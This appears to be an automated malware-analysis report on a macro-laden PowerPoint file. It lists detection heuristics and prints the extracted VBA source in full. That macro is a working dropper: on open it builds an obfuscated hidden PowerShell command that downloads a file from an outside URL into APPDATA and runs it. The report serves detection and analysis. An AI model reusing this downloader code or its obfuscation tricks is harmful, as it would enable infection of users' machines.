MALICIOUS
270
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objqcydwyqnozj = GetObject("new:" & OUTLOOK) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.diamantesviagens.com.br/2021.jPG Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1409 bytes |
SHA-256: 4c66e4d4c169932d02edc2a1523d7ff32389b8b1d41ece5639e62b01b3f81d71 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub Auto_Open()
rQQhFuWy
End Sub
'------------------------------
Public Sub rQQhFuWy()
On Error Resume Next
Dim lll As String
lll = "c"
'a = Left("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
b = Left("PHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
'Right function
c = Left("OHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
'Mid function
q = Mid("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1, 11)
'Split function
d = Split("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
a = "#|Pandorinha|#-windowstyle#|Pandorinha|#hidden#|Pandorinha|#$r='KEX'.replace('K','I');#|Pandorinha|#sal#|Pandorinha|#D#|Pandorinha|#$r;'(&(GCM'+'#|Pandorinha|#*W-O*)'+#|Pandorinha|#'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://www.diamantesviagens.com.br/2021.jPG'',$env:APPDATA+''\\''+''jefinhocudesapo.js'')'|D;#|Pandorinha|#start-process($env:APPDATA+'\\'+'jefinhocudesapo.js')"
a = Replace(a, "#|Pandorinha|#", " ")
bolota = b & c & "wershell" & a
If LYSC = 0 Then
641:
qcydwyqnozj (bolota)
Else
End If
End Sub
Sub qcydwyqnozj(eaoasunlkm As String)
Const OUTLOOK = _
"{0006F03A-0000-0000-C000-000000000046}"
Set objqcydwyqnozj = GetObject("new:" & OUTLOOK)
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 18944 bytes |
SHA-256: 7c83ad63c6920d96713eec95161e9fd2cd2e1fb0253cd08be1f3d9e3afd942a0 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.